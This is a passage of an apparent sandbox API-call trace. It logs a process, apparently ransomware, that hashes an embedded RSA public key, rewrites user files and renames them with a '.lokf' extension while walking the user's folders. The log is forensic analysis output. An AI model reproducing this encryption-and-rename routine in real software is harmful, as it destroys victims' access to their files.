KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.631] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.631] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.631] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.631] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.631] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.631] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.632] GetLastError () returned 0x0 [0059.632] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.632] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.632] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.632] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.632] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.632] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.632] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18f00) returned 0x9c88ae8 [0059.632] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.632] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88010 [0059.632] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88058 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.633] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85740 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.633] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.633] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.634] GetCurrentThreadId () returned 0x9e0 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c840b8 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.634] GetCurrentThreadId () returned 0x9e0 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.634] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.634] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.635] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.635] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.635] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.635] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18ef7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.635] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.635] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.635] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.636] CloseHandle (hObject=0x5cc) returned 1 [0059.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.637] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.637] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\wdJqAyQOW.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\wdjqayqow.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\wdJqAyQOW.ots.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\wdjqayqow.ots.lokf")) returned 1 [0059.638] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5ae690, ftCreationTime.dwHighDateTime=0x1d4c94a, ftLastAccessTime.dwLowDateTime=0x744b50f0, ftLastAccessTime.dwHighDateTime=0x1d4d049, ftLastWriteTime.dwLowDateTime=0x744b50f0, ftLastWriteTime.dwHighDateTime=0x1d4d049, nFileSizeHigh=0x0, nFileSizeLow=0x18ef7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wdJqAyQOW.ots", cAlternateFileName="WDJQAY~1.OTS")) returned 0 [0059.638] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.638] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.638] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0059.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0059.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88058 [0059.638] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.638] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0059.638] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.639] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.639] PathFindFileNameW (pszPath="") returned="" [0059.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.639] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.639] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0059.639] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned=".ini" [0059.639] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0059.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0059.639] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.639] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned=".url" [0059.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.640] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=236) returned 1 [0059.640] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.643] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.643] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.643] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.643] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xec, lpOverlapped=0x0) returned 1 [0059.643] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.644] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.644] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.644] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.644] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.644] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.644] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.644] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.644] GetLastError () returned 0x0 [0059.645] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.645] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.645] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.645] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.645] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.645] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.645] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf0) returned 0x329e1f0 [0059.645] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.645] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88058 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c880a0 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85788 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.645] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.645] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.645] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.645] HeapFree (in: hHeap=0x660000, 